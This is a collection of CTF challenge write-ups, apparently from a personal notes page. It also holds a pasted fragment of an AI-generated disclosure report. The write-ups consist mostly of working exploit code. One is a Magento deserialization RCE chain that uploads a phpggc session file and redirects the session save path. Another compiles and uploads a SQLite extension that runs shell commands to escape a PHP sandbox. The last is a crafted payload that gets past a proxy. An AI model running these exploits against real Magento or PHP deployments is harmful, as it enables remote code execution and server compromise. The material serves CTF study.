  • Static and dynamic analysis: Combine static code analysis with runtime fuzzing of deserialization entrypoints to detect POP chains earlier in the supply chain.

  • Closing notes

  • The described POP chain relies on a combination of (A) available PHP deserialization of attacker-controlled data, (B) the ability to control object property types/values during that process, and (C) file-write capability on the host. All three together produce the RCE.
  • Static analysis (grep + code tracing) was sufficient to locate the chain and map the call sequence, but responsible disclosure and vendor coordination are necessary steps before any public release of exploit PoCs.

  • If you want, I can:

  • produce a one-page PDF / slide summarizing this (ready for disclosure), or
  • rewrite the article into a short technical disclosure template for vendor reporting, or
  • expand the mitigations section into a prioritized action plan.
  • Which of those would you like next?

    CVE Magento\Framework\Url and make taint analysis yourself

    Event NameN1CTF 2025
    GitHub URL-
    Challenge NameThis challenge has been ruined
    Attachments
    References

    solution

    This challenge has been ruined:

    source点为可匿名访问的API,sink点为Magento\Framework\Url, API访问时解析JSON数据进行依赖注入,构建所有实现的依赖关系,使用构造器方法进行污点传播,写个脚本找出source到sink点的所有路径即可

    from __future__ import annotations
    	
    import os
    import re
    import sys
    import xml.etree.ElementTree as ET
    from collections import deque
    from dataclasses import dataclass
    from typing import Dict, List, Optional, Set, Tuple
    
    # Everything is located relative to the directory holding this script.
    SCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))
    MAGENTO_ROOT = os.path.join(SCRIPT_DIR, "magento2-2.4.9-alpha3")
    DI_LIST_PATH = os.path.join(SCRIPT_DIR, "dis.txt")
    WEBAPIS_LIST_PATH = os.path.join(SCRIPT_DIR, "webapis.txt")

    # Fully-qualified name of the sink class the path search targets.
    TARGET_CLASS = "Magento\\Framework\\Url"

    # Directories searched, in this order, when mapping a class name to a file.
    CLASS_ROOTS = [
        os.path.join(MAGENTO_ROOT, *parts)
        for parts in (
            ("app", "code"),
            ("lib", "internal"),
            ("vendor",),
            ("setup",),
            ("generated",),
            ("dev",),
        )
    ]

    # Lower-case type names that never refer to a class.
    PRIMITIVE_TYPES = {
        "array", "bool", "boolean", "callable", "double", "float",
        "int", "integer", "iterable", "mixed", "object", "resource",
        "string", "void", "false", "true", "never",
    }
    
    
    @dataclass
    class ClassInfo:
        """Record of what is known about one PHP class.

        NOTE(review): the code that fills these fields is outside this part of
        the file; the per-field notes below are inferred from the field names
        and types and should be confirmed against the producer.
        """

        # presumably the filesystem path of the PHP file -- TODO confirm
        path: str
        # presumably the PHP namespace declared in that file -- TODO confirm
        namespace: str
        # presumably alias -> fully-qualified name, as built from `use` statements
        use_map: Dict[str, str]
        # presumably the parent class name, or None when there is none
        parent: Optional[str]
        # presumably the class names taken by the constructor
        constructor_deps: List[str]
        # presumably the raw PHP source text -- TODO confirm
        source: str
    
    
    @dataclass(frozen=True)
    class Endpoint:
        """Immutable record pairing a URL and HTTP method with a service class/method.

        ``frozen=True`` makes instances read-only and hashable, so they can be
        stored in sets or used as dict keys.

        NOTE(review): presumably one entry of the web API list
        (``WEBAPIS_LIST_PATH``); the loader is not visible here -- confirm.
        """

        url: str
        http_method: str
        service_class: str
        service_method: str
    
    
    def load_di_mapping(
        di_list_path: Optional[str] = None, base_dir: Optional[str] = None
    ) -> Dict[str, str]:
        """Collect ``<preference for=... type=...>`` pairs from the listed XML files.

        Args:
            di_list_path: Text file naming one XML file per line; blank lines
                and lines starting with ``#`` are ignored. Defaults to
                ``DI_LIST_PATH``.
            base_dir: Directory the listed paths are resolved against.
                Defaults to ``SCRIPT_DIR``.

        Returns:
            Mapping from the ``for`` name to the ``type`` name, both with
            leading backslashes removed. When a name is declared more than
            once, the declaration read last wins. The mapping is empty when
            the list file does not exist.
        """
        list_path = DI_LIST_PATH if di_list_path is None else di_list_path
        root_dir = SCRIPT_DIR if base_dir is None else base_dir

        mapping: Dict[str, str] = {}
        # isfile (rather than exists) so a directory of that name is not opened.
        if not os.path.isfile(list_path):
            return mapping

        with open(list_path, "r", encoding="utf-8") as handle:
            for raw_line in handle:
                line = raw_line.strip()
                if not line or line.startswith("#"):
                    continue
                abs_path = os.path.normpath(os.path.join(root_dir, line))
                if not os.path.isfile(abs_path):
                    continue
                try:
                    tree = ET.parse(abs_path)
                except ET.ParseError:
                    # Skip malformed fixtures (common under dev/tests).
                    continue
                for pref in tree.getroot().findall(".//preference"):
                    target = pref.attrib.get("type")
                    source = pref.attrib.get("for")
                    if target and source:
                        # Last writer wins, mirroring Magento DI behaviour.
                        mapping[source.lstrip("\\")] = target.lstrip("\\")
        return mapping
    
    
    def class_to_path(
        class_name: str, roots: Optional[List[str]] = None
    ) -> Optional[str]:
        """Return the first existing ``<root>/<Namespace>/<Class>.php`` file.

        Args:
            class_name: PHP class name with backslash separators; leading
                backslashes are accepted and ignored.
            roots: Directories to search, in order. Defaults to ``CLASS_ROOTS``.

        Returns:
            Path of the first matching file, or ``None`` when no root contains
            it or the name is empty.
        """
        # Strip leading backslashes first: otherwise the relative path starts
        # with a separator and os.path.join would discard the root entirely.
        trimmed = class_name.lstrip("\\")
        if not trimmed:
            return None
        rel_path = trimmed.replace("\\", os.sep) + ".php"

        search_roots = CLASS_ROOTS if roots is None else roots
        for root in search_roots:
            candidate = os.path.join(root, rel_path)
            if os.path.isfile(candidate):
                return candidate

        return None
    
    
    def parse_use_statements(content: str) -> Dict[str, str]:
        """Map each imported alias in a PHP source to its full name.

        Handles comma-separated imports and brace groups
        (``use A\\{B, C as D};``). Statements that start with ``function`` or
        ``const`` are skipped. A later import of the same alias replaces an
        earlier one.
        """

        def split_top_level(text):
            # Split on commas that are not inside a {...} group.
            pieces = []
            buffer = []
            depth = 0
            for char in text:
                if char == "," and depth == 0:
                    pieces.append("".join(buffer).strip())
                    buffer = []
                    continue
                if char == "{":
                    depth += 1
                elif char == "}":
                    depth = max(0, depth - 1)
                buffer.append(char)
            pieces.append("".join(buffer).strip())
            return [piece for piece in pieces if piece]

        aliases: Dict[str, str] = {}

        for found in re.finditer(r"^\s*use\s+([^;]+);", content, re.MULTILINE):
            statement = found.group(1).strip()
            if not statement:
                continue
            if statement.startswith(("function ", "const ")):
                continue

            for segment in split_top_level(statement):
                if "{" not in segment:
                    full, alias = _extract_use_part(segment)
                    aliases[alias] = full
                    continue

                # Group import: the text before "{" prefixes every member.
                head, _, members = segment.partition("{")
                head = head.strip().rstrip("\\")
                for member in members.rstrip("}").split(","):
                    member = member.strip()
                    if not member:
                        continue
                    full, alias = _extract_use_part(member)
                    qualified = "\\".join(filter(None, (head, full)))
                    aliases[alias] = qualified.strip("\\")

        return aliases
    
    
    def _extract_use_part(part: str) -> Tuple[str, str]:
        pieces = part.split(" as ")
        if len(pieces) == 2:
            full_name = pieces[0].strip().lstrip("\\")
            alias = pieces[1].strip()
        else:
            full_name = part.strip().lstrip("\\")
            alias = full_name.split("\\")[-1]
        return full_name, alias
    
    
    def resolve_type(
        type_name: str, namespace: str, use_map: Dict[str, str]
    ) -> Optional[str]:
        """Turn a PHP type hint into a fully-qualified class name.

        Args:
            type_name: Raw hint as written in the source (may carry ``?``/``&``
                prefixes or be a ``|`` union).
            namespace: Namespace of the file the hint appears in.
            use_map: Alias table produced by ``parse_use_statements``.

        Returns:
            The resolved class name without a leading ``\\``, or ``None`` for
            empty hints, entries of ``PRIMITIVE_TYPES`` and ``parent``.  For a
            union, the first member that resolves is returned.
        """
        if not type_name:
            return None

        cleaned = type_name.strip().lstrip("&").lstrip("?")
        if not cleaned or cleaned.lower() in PRIMITIVE_TYPES:
            return None

        if "|" in cleaned:
            for member in cleaned.split("|"):
                member = member.strip()
                if member.lower() == "null":
                    continue
                hit = resolve_type(member, namespace, use_map)
                if hit:
                    return hit
            return None

        # NOTE(review): ``self``/``static`` yield the *namespace* argument, not a
        # class name -- kept as-is; confirm this is what callers expect.
        if cleaned in ("self", "static"):
            return namespace
        if cleaned == "parent":
            return None

        # Already fully qualified.
        if cleaned.startswith("\\"):
            return cleaned.lstrip("\\")

        # Qualified name: the first segment may be an imported alias, otherwise
        # the whole name is relative to the current namespace.
        if "\\" in cleaned:
            first, rest = cleaned.split("\\", 1)
            base = use_map.get(first)
            joined = [base, rest] if base else [namespace, cleaned]
            return "\\".join(joined).strip("\\")

        imported = use_map.get(cleaned)
        if imported:
            return imported

        return f"{namespace}\\{cleaned}" if namespace else cleaned
    
    
    # Memoised results of get_class_info(); None records "no source file found".
    CLASS_INFO_CACHE: Dict[str, Optional[ClassInfo]] = {}


    def get_class_info(class_name: str) -> Optional[ClassInfo]:
        """Parse the PHP source of *class_name* and return its ``ClassInfo``.

        The file is located with ``class_to_path``.  Namespace, ``use`` aliases,
        parent class and the type-hinted constructor parameters are extracted
        with regular expressions and simple scanning (no real PHP parser), so
        unusual formatting may not be recognised.  Results are cached in
        ``CLASS_INFO_CACHE``.

        Args:
            class_name: Class name in the form accepted by ``class_to_path``.

        Returns:
            The ``ClassInfo`` for the class, or ``None`` when no source file
            exists for it.
        """
        if class_name in CLASS_INFO_CACHE:
            return CLASS_INFO_CACHE[class_name]

        path = class_to_path(class_name)
        if not path or not os.path.isfile(path):
            CLASS_INFO_CACHE[class_name] = None
            return None

        try:
            with open(path, "r", encoding="utf-8") as handle:
                content = handle.read()
        except UnicodeDecodeError:
            # latin-1 maps every byte to a code point, so this retry cannot hit
            # another decode error.
            with open(path, "r", encoding="latin-1") as handle:
                content = handle.read()

        namespace = ""
        ns_match = re.search(r"namespace\s+([^;]+);", content)
        if ns_match:
            namespace = ns_match.group(1).strip()

        use_map = parse_use_statements(content)

        parent = None
        class_match = re.search(
            r"(?:final\s+|abstract\s+)?class\s+(\w+)(?:\s+extends\s+([^\s\{]+))?",
            content,
            re.MULTILINE,
        )
        if class_match:
            parent_raw = class_match.group(2)
            if parent_raw:
                parent = resolve_type(parent_raw.strip(), namespace, use_map)

        deps: List[str] = []
        ctor_match = re.search(r"function\s+__construct\s*\(", content)

        if ctor_match:
            # Find the parenthesis that really closes the parameter list.  A
            # lazy ``(.*?)\)`` stops at the first ``)``, which truncates lists
            # containing defaults such as ``array()`` or attribute arguments
            # and silently drops every parameter after them.
            start = ctor_match.end()
            cursor = start
            paren_depth = 1
            quote = ""
            while cursor < len(content) and paren_depth:
                ch = content[cursor]
                if quote:
                    if ch == "\\":
                        cursor += 1  # skip the escaped character
                    elif ch == quote:
                        quote = ""
                elif ch in "'\"":
                    quote = ch
                elif ch == "(":
                    paren_depth += 1
                elif ch == ")":
                    paren_depth -= 1
                cursor += 1
            # Unbalanced source: treat the constructor as having no parameters.
            params_str = content[start:cursor - 1] if paren_depth == 0 else ""

            # Drop PHP 8 attributes (``#[...]``) in front of parameters.
            params_clean = re.sub(r"#\[[^\]]*\]\s*", "", params_str)

            # Split on commas that are not nested inside (...) or [...].
            tokens: List[str] = []
            current = []
            depth = 0
            for ch in params_clean:
                if ch == "," and depth == 0:
                    token = "".join(current).strip()
                    if token:
                        tokens.append(token)
                    current = []
                    continue
                if ch in ("(", "["):
                    depth += 1
                elif ch in (")", "]"):
                    depth = max(0, depth - 1)
                current.append(ch)
            tail = "".join(current).strip()
            if tail:
                tokens.append(tail)

            for token in tokens:
                token = token.strip()
                if not token:
                    continue
                # Strip the default value, then one leading modifier.
                if "=" in token:
                    token = token.split("=", 1)[0].strip()
                token = re.sub(
                    r"^(public|protected|private|final|readonly|static)\s+", "", token
                )
                # The type hint is the last word before the ``$variable``; any
                # further modifiers in front of it are overwritten on the way.
                type_hint = None
                for part in token.split():
                    if part.startswith("&") or part.startswith("..."):
                        continue
                    if part.startswith("$"):
                        break
                    type_hint = part
                if not type_hint:
                    continue
                resolved = resolve_type(type_hint, namespace, use_map)
                if resolved:
                    deps.append(resolved)

        info = ClassInfo(
            path=path,
            namespace=namespace,
            use_map=use_map,
            parent=parent,
            constructor_deps=deps,
            source=content,
        )
        CLASS_INFO_CACHE[class_name] = info
        return info
    
    
    def resolve_concretes(type_name: str, di_mapping: Dict[str, str]) -> List[str]:
        """Follow DI preferences from *type_name* to the class finally used.

        Each type has at most one preference in ``di_mapping``, so the lookup is
        a simple chain walk.

        Returns:
            A one-element list holding the end of the chain, or an empty list
            when the preferences loop back on themselves.
        """
        name = type_name.lstrip("\\")
        walked: Set[str] = set()

        while name not in walked:
            walked.add(name)
            preferred = di_mapping.get(name)
            if not preferred:
                # No (or empty) preference: this is the concrete type.
                return [name]
            name = preferred.lstrip("\\")

        # Revisited a type: the preference chain is cyclic.
        return []
    
    
    def find_constructor_path(
        start_class: str, di_mapping: Dict[str, str], target: str = TARGET_CLASS
    ) -> Optional[List[str]]:
        """Breadth-first search for a dependency chain from *start_class* to *target*.

        Edges are the constructor dependencies and the parent class reported by
        ``get_class_info``, each mapped through ``resolve_concretes``.  For a
        dependency ending in ``\\Proxy`` the name without that suffix is
        explored as well.

        Returns:
            The list of class names from *start_class* to *target* (inclusive),
            or ``None`` when *target* is not reachable.
        """
        origin = start_class.lstrip("\\")
        came_from: Dict[str, Optional[str]] = {origin: None}
        frontier: deque[str] = deque([origin])

        while frontier:
            cls = frontier.popleft()

            if cls == target:
                # Follow the predecessor links back to the origin, then flip.
                trail: List[str] = []
                step: Optional[str] = cls
                while step is not None:
                    trail.append(step)
                    step = came_from[step]
                return trail[::-1]

            info = get_class_info(cls)
            if not info:
                continue

            outgoing = list(info.constructor_deps)
            if info.parent:
                outgoing.append(info.parent)

            for dep in outgoing:
                dep_name = dep.lstrip("\\")
                variants: Set[str] = {dep_name}
                if dep_name.endswith("\\Proxy"):
                    variants.add(dep_name[: -len("\\Proxy")])

                for variant in variants:
                    for concrete in resolve_concretes(variant, di_mapping):
                        if concrete in came_from:
                            continue
                        came_from[concrete] = cls
                        frontier.append(concrete)

        return None
    
    
    def _parse_method_parameters(
        info: ClassInfo, method_name: str
    ) -> Optional[List[Tuple[str, str]]]:
        """Extract the class-typed parameters of *method_name* from ``info.source``.

        Args:
            info: Parsed class whose ``source``, ``namespace`` and ``use_map``
                are read.
            method_name: Method to look for (matched case-insensitively).

        Returns:
            ``None`` when the class source declares no such method; otherwise a
            list of ``(parameter_name, resolved_type)`` for every parameter
            whose type hint ``resolve_type`` can resolve (possibly empty).
        """
        pattern = re.compile(
            rf"function\s+{re.escape(method_name)}\s*\(",
            re.IGNORECASE,
        )
        match = pattern.search(info.source)
        if not match:
            return None

        # Find the parenthesis that really closes the parameter list.  A lazy
        # ``(.*?)\)`` stops at the first ``)``, which truncates lists containing
        # defaults such as ``array()`` and drops every parameter after them.
        source = info.source
        start = match.end()
        cursor = start
        paren_depth = 1
        quote = ""
        while cursor < len(source) and paren_depth:
            ch = source[cursor]
            if quote:
                if ch == "\\":
                    cursor += 1  # skip the escaped character
                elif ch == quote:
                    quote = ""
            elif ch in "'\"":
                quote = ch
            elif ch == "(":
                paren_depth += 1
            elif ch == ")":
                paren_depth -= 1
            cursor += 1
        # Unbalanced source: the method exists but nothing can be parsed.
        params_str = source[start:cursor - 1] if paren_depth == 0 else ""

        # Drop PHP 8 attributes (``#[...]``) in front of parameters.
        params_clean = re.sub(r"#\[[^\]]*\]\s*", "", params_str)

        # Split on commas that are not nested inside (...) or [...].
        tokens: List[str] = []
        current: List[str] = []
        depth = 0
        for ch in params_clean:
            if ch == "," and depth == 0:
                token = "".join(current).strip()
                if token:
                    tokens.append(token)
                current = []
                continue
            if ch in ("(", "["):
                depth += 1
            elif ch in (")", "]"):
                depth = max(0, depth - 1)
            current.append(ch)
        tail = "".join(current).strip()
        if tail:
            tokens.append(tail)

        results: List[Tuple[str, str]] = []
        for token in tokens:
            token = token.strip()
            if not token:
                continue

            # Strip default assignments.
            if "=" in token:
                token = token.split("=", 1)[0].strip()

            token = re.sub(
                r"^(public|protected|private|final|readonly|static)\s+", "", token
            )

            name_match = re.search(r"\$([A-Za-z_][A-Za-z0-9_]*)", token)
            if not name_match:
                continue
            param_name = name_match.group(1)

            # The type hint is the last word before the ``$variable``.
            type_hint = None
            for part in token.split():
                if part.startswith("&") or part.startswith("..."):
                    continue
                if part.startswith("$"):
                    break
                type_hint = part
            if not type_hint:
                continue

            resolved = resolve_type(type_hint, info.namespace, info.use_map)
            if resolved:
                results.append((param_name, resolved))

        return results
    
    
    def extract_method_parameters(class_name: str, method_name: str) -> List[Tuple[str, str]]:
        """Return the typed parameters of *method_name*, searching up the parent chain.

        Starting at *class_name*, the first class whose source declares the
        method decides the result.  An empty list is returned when no class in
        the chain declares it, a class cannot be loaded, or the parent chain
        loops.
        """
        cls = class_name.lstrip("\\")
        inspected: Set[str] = set()

        while cls not in inspected:
            inspected.add(cls)

            info = get_class_info(cls)
            if not info:
                break

            found = _parse_method_parameters(info, method_name)
            if found is not None:
                return found

            if not info.parent:
                break
            cls = info.parent.lstrip("\\")

        return []
    
    
    def load_webapi_sources() -> List[Endpoint]:
        """Collect anonymously accessible routes from the listed webapi XML files.

        ``WEBAPIS_LIST_PATH`` is read line by line; blank lines and ``#``
        comments are skipped and every other line is taken as a path relative to
        ``SCRIPT_DIR``.  Missing or unparsable XML files are ignored.  A route
        is kept only when it has a ``<resource ref="anonymous">`` and a service
        with a class and a method other than ``DEFAULT``.
        """
        found: List[Endpoint] = []

        if not os.path.exists(WEBAPIS_LIST_PATH):
            return found

        with open(WEBAPIS_LIST_PATH, "r", encoding="utf-8") as listing:
            for entry in map(str.strip, listing):
                if not entry or entry.startswith("#"):
                    continue

                xml_path = os.path.normpath(os.path.join(SCRIPT_DIR, entry))
                if not os.path.isfile(xml_path):
                    continue

                try:
                    document = ET.parse(xml_path)
                except ET.ParseError:
                    continue

                for route in document.getroot().findall(".//route"):
                    service = route.find("service")
                    resources = route.find("resources")
                    if service is None or resources is None:
                        continue

                    refs = [res.attrib.get("ref") for res in resources.findall("resource")]
                    if "anonymous" not in refs:
                        continue

                    cls = service.attrib.get("class")
                    method = service.attrib.get("method")
                    if not (cls and method) or method == "DEFAULT":
                        continue

                    found.append(
                        Endpoint(
                            url=route.attrib.get("url", ""),
                            http_method=route.attrib.get("method", ""),
                            service_class=cls.lstrip("\\"),
                            service_method=method,
                        )
                    )

        return found
    
    
    def main() -> int:
        """Report anonymous web API methods whose parameters reach the target class.

        For every endpoint from ``load_webapi_sources`` the service method's
        typed parameters are resolved through the DI mapping, and
        ``find_constructor_path`` is asked for a dependency chain from each
        parameter type.  Unique chains are printed per endpoint.

        Returns:
            Always ``0``.
        """
        di_mapping = load_di_mapping()
        endpoints = load_webapi_sources()

        if not endpoints:
            print("No anonymous web API endpoints detected; nothing to scan.")
            return 0

        hits: List[Tuple[Endpoint, List[List[str]]]] = []

        for endpoint in endpoints:
            chains: List[List[str]] = []
            already_reported: Set[Tuple[str, ...]] = set()

            for service_impl in resolve_concretes(endpoint.service_class, di_mapping):
                signature = extract_method_parameters(
                    service_impl, endpoint.service_method
                )
                for param_name, param_type in signature:
                    for param_impl in resolve_concretes(param_type, di_mapping):
                        path = find_constructor_path(param_impl, di_mapping)
                        if not path:
                            continue

                        # Show the concrete class only when it differs from the
                        # declared parameter type.
                        head = [] if path[0] == param_type else [path[0]]
                        chain = [f"${param_name}: {param_type}", *head, *path[1:]]

                        fingerprint = tuple(chain)
                        if fingerprint in already_reported:
                            continue
                        already_reported.add(fingerprint)
                        chains.append(chain)

            if chains:
                hits.append((endpoint, chains))

        if not hits:
            print(
                "No anonymous web API services reach Magento\\Framework\\Url via constructor injection."
            )
            return 0

        def report_order(hit):
            ep = hit[0]
            return (ep.http_method, ep.url, ep.service_class, ep.service_method)

        hits.sort(key=report_order)

        for endpoint, chains in hits:
            print(
                f"{endpoint.http_method} {endpoint.url} :: "
                f"{endpoint.service_class}::{endpoint.service_method}"
            )
            for number, chain in enumerate(chains, 1):
                print(f"  Path {number}:")
                for node in chain:
                    print(f"    -> {node}")
            print()

        return 0
    
    
    # Run the scan only when executed as a script; main()'s return value becomes
    # the process exit status.
    if __name__ == "__main__":
        sys.exit(main())
    

    在所有路径中找了一条最短的路径,移除涉及payment类的路径,如下

    POST /V1/guest-carts/:cartId/billing-address :: Magento\Quote\Api\GuestBillingAddressManagementInterface::assign
      Path 1:
        -> $address: Magento\Quote\Api\Data\AddressInterface
        -> Magento\Quote\Model\Quote\Address
        -> Magento\Directory\Helper\Data
        -> Magento\Framework\App\Helper\Context
        -> Magento\Backend\Model\Url
        -> Magento\Framework\Url

    不难将这个指定session file的漏洞和已知文件上传漏洞串联起来,利用脚本如下

    import secrets
    import string

    import requests

    target = 'http://60.205.163.215:32640'

    # Random identifiers generated in-process instead of shelling out to
    # `cat /dev/urandom | tr | fold | head`, which only works on Unix-like hosts.
    FORMKEY = ''.join(secrets.choice(string.ascii_letters + string.digits) for _ in range(16))
    SESSID = ''.join(secrets.choice(string.ascii_lowercase + string.digits) for _ in range(26))
    print(f"[+] Using form_key: {FORMKEY}")
    print(f"[+] Using session_id: {SESSID}")

    # docker run --rm -v .:/mnt phpgc -se -pub -a Guzzle/FW1 /proc/self/cwd/index.php /mnt/payload.php > exp.sess

    # Step 1: upload exp.sess under the name sess_<SESSID>.
    url = f"{target}/customer/address_file/upload"
    data = {
        'form_key': FORMKEY,
    }
    cookies = {
        'form_key': FORMKEY,
    }
    # Context manager so the file handle is closed once the upload is done.
    with open('exp.sess', 'rb') as session_file:
        files = {
            'custom_attributes[country_id]': (f'sess_{SESSID}', session_file, 'application/octet-stream'),
        }
        response = requests.post(url, files=files, data=data, cookies=cookies)
    print(response.text)

    # Step 2: send the nested "address" object with PHPSESSID set to the same id.
    url = f"{target}/rest/default/V1/guest-carts/abc/billing-address"
    data = {
        "address": {
            "directoryData": {
                "context": {
                    "urlBuilder": {
                        "session": {
                            "sessionConfig": {
                                "savePath": "media/customer_address/s/e"
                            }
                        }
                    }
                }
            }
        }
    }
    response = requests.post(url, json=data, cookies={'PHPSESSID': SESSID})
    print(response.text)
    
    Image

    PHP Sandbox bypass using PDO SQLite

    Event NameXCTF 2025
    GitHub URL-
    Challenge Namei forgot the challenge name
    Attachments
    References

    tl;dr about the challenge

    solution
    import httpx
    import asyncio
    import subprocess
    import base64
    import os
    
    URL = "http://localhost:12345/"
    
    class BaseAPI:
        """Small wrapper around an ``httpx.AsyncClient`` bound to the target URL."""

        def __init__(self, url=URL) -> None:
            self.c = httpx.AsyncClient(base_url=url, timeout=10000)

        def eval(self, code: str) -> "Awaitable[httpx.Response]":
            """Send *code* in the ``eval`` query parameter of ``GET /``.

            This is a plain ``def`` that hands back the un-awaited result of
            ``AsyncClient.get``, so callers must ``await`` it to obtain the
            response (the previous ``-> str`` annotation was incorrect).
            """
            return self.c.get(
                "/",
                params={"eval": code}
            )
    
    class API(BaseAPI):
        """Concrete client; adds nothing on top of ``BaseAPI``."""
        ...
    
    async def upload_base64_file(api: BaseAPI, b64_content: str, remote_path: str, chunk_size: int = 4000):
        """Upload base64 in 4-char-aligned chunks to a .b64 file, then decode once.

        Args:
            api: Client whose ``eval`` sends PHP code to the target.
            b64_content: Base64 text to transfer.
            remote_path: Destination path of the decoded file; the staging file
                is ``remote_path + '.b64'``.
            chunk_size: Maximum characters per request.  Rounded down to a
                multiple of 4 so every chunk is a whole base64 group; values
                below 4 (including 0 and negatives) are raised to 4.
        """
        # The old check only adjusted non-multiples of 4: chunk_size=0 crashed
        # range() and a negative multiple of 4 silently uploaded nothing.
        chunk_size = max(4, chunk_size - chunk_size % 4)

        b64_path = remote_path + '.b64'

        for offset in range(0, len(b64_content), chunk_size):
            chunk = b64_content[offset:offset + chunk_size]
            # The first chunk truncates/creates the staging file, later ones append.
            template = (
                "file_put_contents('%s','%s');echo 'ok';"
                if offset == 0 else
                "file_put_contents('%s','%s',FILE_APPEND);echo 'ok';"
            )
            await api.eval(template % (b64_path, chunk))

        decode = await api.eval(
            """
    $b64 = file_get_contents('%s');
    file_put_contents('%s', base64_decode($b64));
    clearstatcache();
    $s = @filesize('%s');
    var_dump($s !== false ? ('size=' . $s) : 'size_error');
            """ % (b64_path, remote_path, remote_path)
        )
        print(decode.text.strip())
    
    def build_shared_object():
        """Build the shared object and return base64 encoded content.

        Writes ``hello.c`` to the working directory unless it already exists,
        compiles it with ``gcc`` into ``libhello_fd.so`` and returns the
        library's bytes as base64 text.

        Returns:
            The base64 string, or ``None`` when gcc is missing, compilation
            fails, or the compiled file cannot be read.

        Build artifacts are removed on every exit path.  ``hello.c`` is only
        deleted when this call created it, so a source file supplied by the
        user is left in place.
        """
        c_file = "hello.c"
        so_file = "libhello_fd.so"
        created_source = False
        
        # Create the C source if it doesn't exist
        if not os.path.exists(c_file):
            c_source = '''#include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <sqlite3ext.h>
    
    SQLITE_EXTENSION_INIT1
    
    // Simple function that prints "Hello from shared object!"
    static void hello_function(sqlite3_context *context, int argc, sqlite3_value **argv) {
        sqlite3_result_text(context, "Hello from shared object!", -1, SQLITE_STATIC);
    }
    
    // Function to execute system commands and return output
    static void exec_function(sqlite3_context *context, int argc, sqlite3_value **argv) {
        if (argc < 1) {
            sqlite3_result_error(context, "exec_function requires one argument", -1);
            return;
        }
        
        const char *command = (const char*)sqlite3_value_text(argv[0]);
        if (command == NULL) {
            sqlite3_result_error(context, "exec_function: invalid command", -1);
            return;
        }
        
        // Execute command and capture output
        FILE *fp = popen(command, "r");
        if (fp == NULL) {
            sqlite3_result_error(context, "Failed to execute command", -1);
            return;
        }
        
        char buffer[4096];
        char output[8192] = "";
        
        while (fgets(buffer, sizeof(buffer), fp) != NULL) {
            strncat(output, buffer, sizeof(output) - strlen(output) - 1);
        }
        
        int exit_code = pclose(fp);
        
        // If we got output, return it; otherwise return exit code info
        if (strlen(output) > 0) {
            sqlite3_result_text(context, output, -1, SQLITE_TRANSIENT);
        } else {
            char result_str[128];
            snprintf(result_str, sizeof(result_str), "Command executed with exit code: %d", exit_code);
            sqlite3_result_text(context, result_str, -1, SQLITE_STATIC);
        }
    }
    
    // Extension entry point
    int sqlite3_hellofd_init(sqlite3 *db, char **pzErrMsg, const sqlite3_api_routines *pApi) {
        SQLITE_EXTENSION_INIT2(pApi);
        
        // Register our custom functions
        sqlite3_create_function(db, "hello", 0, SQLITE_UTF8, 0, hello_function, 0, 0);
        sqlite3_create_function(db, "exec_cmd", 1, SQLITE_UTF8, 0, exec_function, 0, 0);
        
        return SQLITE_OK;
    }'''
            
            with open(c_file, 'w') as f:
                f.write(c_source)
            created_source = True
            print(f"Created {c_file}")
        
        # Compile the shared object
        compile_cmd = [
            "gcc", 
            "-shared", 
            "-fPIC", 
            "-o", so_file,
            c_file,
            "-lsqlite3"
        ]
        
        try:
            try:
                print(f"Compiling {c_file} into {so_file}...")
                subprocess.run(compile_cmd, check=True, capture_output=True, text=True)
                print(f"Successfully compiled {so_file}")
            except subprocess.CalledProcessError as e:
                print(f"Compilation failed: {e}")
                print(f"Error output: {e.stderr}")
                return None
            except FileNotFoundError:
                print("Error: gcc not found. Please install gcc to compile the shared object.")
                return None
            
            # Read and encode the shared object
            try:
                with open(so_file, 'rb') as f:
                    return base64.b64encode(f.read()).decode()
            except OSError as e:
                print(f"Error reading {so_file}: {e}")
                return None
        finally:
            # Runs for success and for every failure above.  Missing files are
            # ignored so cleanup can never replace the function's result with a
            # FileNotFoundError.
            leftovers = [so_file]
            if created_source:
                leftovers.append(c_file)
            for leftover in leftovers:
                try:
                    os.remove(leftover)
                except FileNotFoundError:
                    pass
    
    async def main():
        """Build the extension, upload it in chunks and print the target's reply."""
        client = API()
        print("=== Building Shared Object ===")
        
        # Build the shared object
        encoded_so = build_shared_object()
        if not encoded_so:
            print("Failed to build shared object!")
            return
        
        print(f"Base64 content length: {len(encoded_so)} characters")
        print("=== Uploading and Executing ===")
        
        # Upload the shared object in chunks to avoid 414
        print("Uploading shared object in chunks...")
        await upload_base64_file(client, encoded_so, '/tmp/libhello_fd.so', chunk_size=4000)
        
        # PHP sent to the target: load the uploaded library into an in-memory
        # SQLite database and call the two functions it registers.
        php_probe = r"""
    error_reporting(-1);
    try {
        $db = new Pdo\Sqlite('sqlite::memory:');
        $db->loadExtension('/tmp/libhello_fd.so');
        var_dump("Extension loaded successfully");
        
        // Test our custom functions
        $result = $db->query("SELECT hello()")->fetchColumn();
        var_dump("hello() result: " . $result);
        
        // Test exec function with different commands
        $commands = [
            'cat /flag.txt',
        ];
        
        foreach ($commands as $cmd) {
            $exec_result = $db->query("SELECT exec_cmd('" . $cmd . "')")->fetchColumn();
            var_dump("exec_cmd('" . $cmd . "'): " . $exec_result);
        }
        
    } catch (Throwable $e) {
        var_dump("Error: " . $e->getMessage());
    }
    """
        print("Loading extension and testing...")
        reply = await client.eval(php_probe)
        print(reply.text)
    
    # Script entry point: drive the async main() to completion on a new event loop.
    if __name__ == "__main__":
        asyncio.run(main())

    Php trick

    Event NameLine CTF 2025
    GitHub URL-
    Challenge NameRestricted Proxy
    Attachments
    References

    Image
    solve
    import httpx
    import asyncio
    from urllib.parse import quote
    
    URL = "http://136.110.79.68:10002"
    URL = "http://localhost:10002"
    
    class BaseAPI:
        """Async HTTP client bound to the challenge URL."""

        def __init__(self, url=URL) -> None:
            self.c = httpx.AsyncClient(base_url=url)

        def home_post(self, data):
            """POST *data* to ``/`` as a form body; the result must be awaited."""
            form_headers = {"Content-Type": "application/x-www-form-urlencoded"}
            return self.c.post("/", data=data, headers=form_headers)
    
    class API(BaseAPI):
        """Concrete client; adds nothing on top of ``BaseAPI``."""
        ...
    
    async def main():
        """Send the crafted form body to the home endpoint and print the reply."""
        client = API()
        encoded_params = quote(r"flag?cmd=(f)&fmt={0:[w:=iter(w)]}")
        print(encoded_params)
        # The body is assembled by hand (not from a dict) so it is sent verbatim.
        form_body = "".join([
            "submit=1&host=nginx&path=get%0a&params=",
            encoded_params,
            "&token_header=:X-From-Restric&token=ted-Proxy:8007370437",
        ])
        reply = await client.home_post(form_body)
        print(reply.text)
